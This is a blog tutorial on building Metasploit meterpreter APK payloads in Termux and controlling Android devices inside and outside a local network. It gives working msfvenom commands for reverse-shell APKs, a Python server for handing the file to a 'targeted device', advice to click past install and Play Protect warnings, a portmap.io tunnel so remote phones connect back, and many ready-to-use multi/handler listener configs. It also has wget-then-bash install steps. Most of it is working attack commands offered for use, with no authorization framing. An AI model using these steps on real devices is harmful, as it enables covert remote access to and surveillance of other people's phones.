Best way to generate Metasploit payloads in Termux Inside and outside LAN | Termux Tutorial

EFX TV
March 24, 2021
Again Welcome back to EFX Tv, this blog will be among one the most useful for you as I'm going to share the

Best Way to Generate Metasploit Payloads in Termux

If you have been reading my blogs regularly and Subscribed to my Youtube channel. You come to know that Don't share things frequently however you will learn some hidden tips and tricks for Linux, Termux, Kali Linux, Ubuntu, Android, and Windows, etc.
Ngrok Link Problem Fixed In today's blog, you will get a detailed way to generate and use the Metasploit payloads in Termux. Very soon I'll share how to do the same thing using Kali Linux and Ubuntu.
Related questions I'll be answering, are listed below:
0 What is Termux, Termux Black and Metasploit?
1 How to install Termux and Termux Black?
2 How to Install Metasploit and related requirements in Termux?
3 How to search for available Payloads and generate them one by one?
4 How to exploit Targeted devices outside the network using portmap.io?
5 List of available payloads for Android, Windows, and Linux?
6 Generate and exploit inside the network and outside the network?
7 From where automated .rc file can be generated to quickly start the Metasploit Listener in Termux?
8 Bonux payloads and Listeners list?

YOU SHOULD ALSO CHECK FOR

TERMUX TUTORIAL
Termux And Functionality Click Here
Create Localhost Using Termux Click Here
TERMUXEasyPhishEFX Click Here
Hack An Android Device MSFVenom Click Here
Install Kali Nethunter In Termux Click Here
Download Youtube Playlist Termux Tutorial Click Here
Host A Payload Using Termux Click Here
What Is Termuxblack By Haxus Click Here

0 What is Termux, Termux Black, and Metasploit?
Termux is an Android-based application that works as a Linux terminal in Android-based mobile phones. Termux helps you to performs almost all the Linux (CLI/GUI-based ) tasks on Android Phone. Limitations are for non-rooted android devices (no root-access).

Termux Black is an unofficial repository for Termux, which gives easy access to some most useful repositories, was available for root users only with some extra navigation Keys.

The Metasploit is an open-source project that contains several lists of payloads against so many vulnerabilities concern with hardware, software, web applications, etc. It is the most used tool for penetration testers to gather information about a particular IP (device on the internet). Nmap, NetCat, TCP-Dump, Httrack, vnstat , Iftop, Nload, Burp Suite, Wireshark, Wget, Curl, can also be useful.

1 How to install Termux and Termux Black?
To install Termux you need to download two apps on your android device. 1 Termux and, 2 Termux API. Go to the play store and download them both. After that, you have to provide them the storage permissions so that they can access the storage to create the files on your device.

As I already explained Termux Black is an unofficial repository for Termux. To download the Termux Black script for Termux you need to visit its official git repository (clone the repository for that you need to have git installed in your Termux). Clone the Termux black repository, before that install the git in the Termux. After that run the command in the Terminal and restart the Termux App.
 $ apt install git wget curl 
 $ apt update  
 $ apt upgrade 
 $ apt dist-upgrade 
 $ cd $HOME 
 $ wget https://github.com/Hax4us/TermuxBlack/raw/master/install.sh 
 $ bash install.sh


2 How to Install Metasploit and related requirements in Termux?
Again Metasplont for Termux is a Termux Black repository that works fine. If you download the script from somewhere else you may get some error. Run the commands to download and install the script Metasploit in Termux. Metasploit 
 $ cd $HOME 
 $ wget https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh 
 $ chmod +x metasploit.sh 
 $ ./metasploit.sh

3 How to search for available Payloads and generate them one by one?
To search list or get a copy of all the available payloads you can run the command below: It will generate a file payload.txt which will contain all the list of payloads available as of now. 
 $ msfvenom -l payloads >payload.txt
To find the payloads for a specific device you can run the grep command. As shown in the image below. Similarly, you can search for payloads belongs to PHP, java, reverse TCP, Linux, etc. 
 $ cat payload.txt |grep android


Another example for Reverse tcp payloads 
 $ cat payload.txt |grep reverse_tcp


To get more details about the payload you need to run the command. 
 $ msfvenom -p PAYLOAD-NAME --list-options
For example, I'm going to show you details about android/meterpreter/reverse_tcp. Please see look at the image below. 
 $ msfvenom -p android/meterpreter/reverse_tcp --list-options


There are some more options available for searching payloads on basis of platforms, formats, architecture, encryptions, module,exploit. all the commands are listed below. 
 $ msfvenom --list platforms	  
 $ msfvenom --list formats	  
 $ msfvenom --list archs	  
 $ msfvenom --list encrypt

How to search for exploit and payload with in the metasploit

Commands listed below will help you to search specific device/service/version/make and model/module based payloads/exploit/encoders. Must try these commands on your terminal and practice as much as you can. 
 $ search exploit android 
 $ search exploit windows 
 $ search exploit dlink 
 $ search exploit servicename

How to Advance search and information about exploit in metasploit

Step 1 Commands listed below will help you to get more deep details about the specific payload. All the commands explained below.
First run msfconsole and search for exploit using command 
 $ search exploit windows

Step 2 Use payload, for example I'm going to use ( exploit/multi/local/allwinner_backdoor ) 
 $ use exploit/multi/local/allwinner_backdoor

Step 3 Search for information on selected payload or exploit in Metasploit simply type command in the terminal. Command show options will help you to verify the details you have entered concern to target, port other options available for the payload you can use by default module. Info command will bunch of informations related to exploit (payload name, module, arch, payload rank, basic options, payload information, Description and References). For obtaining the advanced details type command advanced (Current Setting and description for the specific exploit you selected) Required Description 
 $ show options 
 $ info 
 $ advanced

How to to create rc file in metasploit

First of all RC file (text-based file with the extension of .rc) is allows you to execute the commands automatically after starting msfconsole. RC file contains a list of commands you have used after executing the Metasploit and you want to use after getting the sessions. There is a special feature in Metasploit nobody talks about. You can create an RC file in Metasploit while using the msfconsole in the terminal. Suppose that you have used lots of modules and you don't memorize them, you can simply save all the called modules in an RC file that ends with extension .rc. For that, you have to run the command mentioned below. You can change the file.rc to anything but the extension should be the same. For more details you can use help command just after executing msfconsole
 $ makerc file.rc


4 Generate and exploit payload for Targeted devices Inside and outside the network?

Inside the LAN (local area network)

First, you need to get your device/local Ip using the command written below. Ipaddress starts with 192 it depends on your router configuration. Click the image, you can see the highlighted section contains IP for my Termux. 
 $ ifconfig|grep inet


For android, you can generate the payload using the command written below. Simply copy-paste it in the terminal. I'm going to use LPORT=0.0.0.0 and LPORT=4445. Once you paste the command hit enter key it will generate the payload.apk for you. 
 $ msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.2 lport=4445 R > payload.apk


Share the app file to the targeted device connected to your network/wifi. After entering the command in the terminal, it will start a web-based python server which will be visible to all the devices connected with your wifi on address http://192.168.0.2:8000. Click on the APK file and install it inside your device. For this demonstration, I'm going to install the APK on my Android device. 
 $ python -m http.server 8000


Click on install INSTALL ANYWAY

Click on DONT SEND

Now you can open the app and click on CONTINUE. Make sure your device needs to be connected to the local area network via Wifi. App has been installed and running on my device. Now, let us start the listener.

The listener for the Android-Reverse-TCP payload is written below.

Copy everything inside the box. Open the Termux and go to the same directory where APK is generated. Create a file name it as File.rc. Use the command to create the file. 
 $ nano file.rc


Paste everything you copied from the above box and hit keys ctrl + o (hit enter) ctrl + x (hit enter) Now we will run the listener : To run the Metasploit listener for Android PAYLOAD android/meterpreter/reverse_tcp run the command written below. Note RC file should be in the same directory. 
 $ msfconsole -q -r 'File.rc'


Once you hit the command, you will be able to see something like shown in the image below. It means we are getting sessions from the concerned device on which our app is installed.

To check the number of sessions run the command shown below. You can see the session number 1,4 and 5 are active. 
 $ sessions


To get the session from the active session run the command mentioned below. In the below image you can see that we have got a Meterpreter session. From here, we can do lots of things. 
 $ sessions 1


To check all the list of command you can run on the Meterpreter session you can type command help 
 $ help
For example, I've run the command sysinfo, output shown in the image below.

Similar way you can run more commands to get the desired thing done from the device your app is installed in. Help command and question mark sign "?" will show you all the related commands and help. For more payload commands visit the link.

Outside the LAN (local area network)


To do the same thing outside the LAN follow the steps:
Step1
Signup to the portmap.io and set up port forwarding Please watch the video to Signup and set up portmap.io on an Android device. For full screen click here.

Step2
Download android app which is known as open VPN
Go to the Android play store and search for OpenVPN. You will get the application, Install the application.
Click on the plus button
Tap on FILE
Locate the downloaded .ovpn file, click on it, and hit IMPORT
Now checkmark Connect after import
Press the ADD button at the top right
When you see the green mark just after your OpenVPN profile it shows the connection is active.

Step3
Generate the payload Using the command written below
Where LHOST and LPORT will be according to your portmap.io account. Change the LHOST and LPORT with your details and paste them into the Termux (hit enter). Again go above and copy the RC file details and change your LPORT and Lhost. 
 $ msfvenom -p android/meterpreter/reverse_tcp lhost=portmapsystem-30901.portmap.host lport=30901 R > payload.apk


RC file for outside the internet

Step4
Now exploit the app. To verify we are getting connections from outside the network or not simply run your device on mobile data. Install the app on any device which is connected to the internet. Now run the listener before that make sure you have followed the stpe3 correctly. Step 3 will create a tunnel that contains the same configuration your android app has and provide you the reverse TCP connection through which you can do so many things.

To start the listener run the command 
 $ msfconsole -q -r File.rc
Now check for the active sessions as we see above. This command will list all the active sessions 
 $ sessions


Now connect the session to get access to the device. Session numbers can be different on your Android device. Make sure you put the active session number to get the reverse connection. 
 $ sessions 1

5 List of available payloads for Android, Windows, and Linux? 
 $ msfvenom -l payloads >payload.txt 
 $ cat payload.txt|grep android 
 $ cat payload.txt|grep windows 
 $ cat payload.txt|grep linux 
 $ cat payloads.txt |grep linux|awk '{print $1}'|sed 's#^#$ #g'


6 Generate and exploit inside the network and outside the network?
Step1
Signup to portmap.io

Step2
Configure the download file with the android OpenVPN app Step 3
Generate and share exploit app

Step 4
Start the listener.rc file 
 $ msfconsole -q -r File.rc


Step 5
List all the active sessions 
 $ sessions


Step 6
Connect the session 
 $ sessions 1


Step 7
Type help to get the related command to see advance access options.

7 From where automated .rc file can be generated to quickly start the Metasploit Listener in Termux?
You can search it on google you will get almost all the RC files online. Just change the PAYLOAD name and the rest will remain the same. I'll create an app for that very soon.

 
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST hpproject2020-63544.portmap.host
set LPORT 3333
set ExitOnSession false
set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j
8 Bonus payloads and Listeners list?
PAYLOAD android/meterpreter/reverse_http
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_http set LHOST ChangeIP
set LPORT 3333
set ExitOnSession false
set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

PAYLOAD android/meterpreter/reverse_https
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_https set LHOST ChangeIP
set LPORT 3333
set ExitOnSession false
set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

PAYLOAD android/meterpreter/reverse_tcp
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST ChangeIP
set LPORT 3333
set ExitOnSession false
set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

PAYLOAD android/meterpreter_reverse_http
use exploit/multi/handler
set PAYLOAD android/meterpreter_reverse_http
set LHOST ChangeIP
set LPORT 3333
set ExitOnSession false
set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'

run -j PAYLOAD android/meterpreter_reverse_https
use exploit/multi/handler
set PAYLOAD android/meterpreter_reverse_https
set LHOST ChangeIP
set LPORT 3333
set ExitOnSession false
set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

PAYLOAD android/meterpreter_reverse_tcp
use exploit/multi/handler
set PAYLOAD android/meterpreter_reverse_tcp
set LHOST ChangeIP
set LPORT 3333
set ExitOnSession false
set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

PAYLOAD android/shell/reverse_http
use exploit/multi/handler
set PAYLOAD android/shell/reverse_http
set LHOST ChangeIP
set LPORT 3333
set ExitOnSession false
set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

PAYLOAD android/shell/reverse_https
use exploit/multi/handler
set PAYLOAD android/shell/reverse_https
set LHOST ChangeIP
set LPORT 3333
set ExitOnSession false
set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

PAYLOAD android/shell/reverse_tcp
use exploit/multi/handler
set PAYLOAD android/shell/reverse_tcp
set LHOST ChangeIP
set LPORT 3333
set ExitOnSession false
set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

More listeners will be added in upcoming days. Please like and subscribe our youtube channel for more tutorials like this.

For full screen video click here

Uk2blogger